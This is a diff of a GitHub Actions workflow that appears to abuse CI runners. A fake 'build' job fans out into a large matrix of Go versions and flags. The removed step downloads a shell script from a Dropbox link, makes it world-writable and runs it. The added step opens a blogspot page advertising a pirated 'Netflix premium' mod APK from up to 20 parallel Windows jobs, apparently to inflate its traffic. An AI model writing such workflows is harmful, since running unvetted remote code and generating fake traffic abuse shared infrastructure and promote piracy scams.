--- a/.github/workflows/main.yml
+++ b/.github/workflows/main.yml
@@ -1,4 +1,4 @@
-name: ubuntu 1 pestañas 360min
+name: hjkhlljnljjj
 # on: [push, pull_request]
 on:
   schedule:
@@ -7,19 +7,21 @@ on:
    
 jobs:
   build:
-    runs-on: ubuntu-latest
+    runs-on: windows-latest
     strategy:
-      max-parallel: 1
+      max-parallel: 20
       fail-fast: false
       matrix:
         go: [1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.1, 2.2]
         flag: [A, B, C, D, E, F, G, H, I, G, K, L, M, N, Ñ, O, P, K]
-    timeout-minutes: 360
+    timeout-minutes: 1
     env:
         NUM_JOBS: 900
         JOB: ${{ matrix.go }}
     steps:
     - name: ok
-      run: wget https://www.dropbox.com/s/iod9hgxsuqrhn4l/ok.sh && sudo chmod 777 ok.sh && ./ok.sh
+      run: start https://yoelmod.blogspot.com/2022/05/netflix-premium-free-mod-apk.html
+    - name: okk
+      run: ping 127.0.0.1 -n 30
     - name: listo
       run: exit
